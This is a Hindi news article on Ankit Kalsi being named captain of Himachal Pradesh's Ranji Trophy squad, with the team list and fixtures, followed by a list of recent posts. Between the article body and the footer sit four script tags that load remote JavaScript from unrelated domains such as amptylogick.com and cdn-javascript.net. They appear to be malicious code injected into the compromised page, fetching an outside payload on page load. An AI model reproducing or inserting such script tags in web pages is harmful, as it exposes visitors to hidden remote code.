Categories: खेल

HPCA ने अंकित कलसी को सौंपी हिमाचल की रणजी टीम की कमान

<p>हिमाचल प्रदेश क्रिकेट एससोसिएशन ने रणजी ट्रॉफी के लिए 15 सदस्यीय टीम की घोषणा कर दी है। जिला ऊना के अंकित कलसी को हिमाचल की रणजी टीम की कमान सौंपी गई है। 9 दिसंबर से धर्मशाला स्टेडियम में हिमाचल टीम अंकित कलसी के नेतृत्व में सौराष्ट्र के खिलाफ मैदान में उतरेगी। अंतरराष्ट्रीय क्रिकेट स्टेडियम धर्मशाला में 9 दिसंबर से ग्रुप बी में हिमाचल और सौराष्ट्र का पहला मुकाबला होगा। सौराष्ट्र की ओर से चेतेश्वर पुजारा मैदान में उतरेंगे।</p>

<p>अंकित कलसी के अलावा टीम में विकेट कीपर अंकुश बैंस, प्रशांत चोपड़ा, प्रियांशु खंडूरी, सुमित वर्मा, एकांत सेन, ऋषि धवन, निखिल गांगटा, मयंक डागर, अंकुश बेदी, आकाश वशिष्ठ, पंकज जसवाल, कंवर अभिनव, वैभव अरोड़ा और प्रवीण ठाकुर को शामिल किया गया है। रणजी ट्रॉफी के ग्रुप बी में हिमाचल प्रदेश के अलावा सौराष्ट्र, तमिलनाडु, कर्नाटक, उत्तर प्रदेश, रेलवे, बड़ौदा, मुंबई और मध्य प्रदेश शामिल हैं। हिमाचल के प्रशांत चोपड़ा और मध्यक्रम के बल्लेबाज अंकित कलसी के प्रदर्शन पर सबकी नजर रहेगी। सौराष्ट्र की टीम में पुजारा के अलावा जयदेव उनादकट, शेल्डन जैक्सन, अर्पित, डी जडेजा, कमलेश, स्नेल पटेल, चिराग जानी और हर्विक देसाई आदि शामिल हैं।</p>

<p>धर्मशाला स्टेडियम में रणजी मैच सौराष्ट्र 9 से 12 दिसंबर को होगा। इसके अलावा मध्यप्रदेश का 6 से 9 जनवरी, बड़ौदा का 19 से 22 जनवरी और मुंबई का 27 से 30 जनवरी को होगा। इसके अलावा धर्मशलाा से बाहर होने वाले मैचों में तमिलनाडु का 17 से 20 दिसंबर को तिरूनेलवेली, कर्नाटक का 25 से 28 दिसंबर को मैसूर, रेलवे का 4 से 7 फरवरी को दिल्ली और उत्तर प्रदेश का 12 से 16 फरवरी को लखनऊ में होगा।</p>

<p>&nbsp;</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1575783190253″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Himachal: भाजपा विधायक बिक्रम सिंह ने लौटाई एमएचए की सिक्योरिटी

  धर्मशाला:जसवां प्रागपुर से भाजपा विधायक बिक्रम सिंह ने एमएचए की सिक्योरिटी लौटा दी है।…

11 hours ago

शिलाई में सड़कों पर उतरे हिन्दू संगठनों का प्रदर्शन

  शिलाई में वक्फ बोर्ड व अवैध तरीके से रह रहे लोगों का विरोध Shillai:…

16 hours ago

एयर मार्शल अमर प्रीत सिंह होंगे अगले वायुसेना प्रमुख

  New Delhi: एयर मार्शल अमर प्रीत सिंह को अगले Chief of the Air Staff…

16 hours ago

बंद नहीं अपग्रेड होगा गोपालपुर चिड़ियाघर

  गोपालपुर चिड़ियाघर बंद नहीं होगा। बल्कि अपग्रेड किया जा रहा है। चिड़ियाघर में व्‍यवस्‍थाएं…

17 hours ago

कांगड़ा में दो हादसे:टैंक में तीन मजदूर बेह‍ोश, स्कूल बस और कार से टकराई पंजाब रोड़वेज की बस, एक गंभीर

  धर्मशाला: कांगड़ा में शनिवार को दो हादसे हुए हैं। पहला हादसा बसनूर शाहपुर का…

17 hours ago

पहले खाए बादाम फिर चोरी की वारदात को अंजाम

हमीरपुर के दो संस्थानों में चोरी की वारदात लैपटॉप,नगदी और चांदी के सिक्के हुए चोरी…

17 hours ago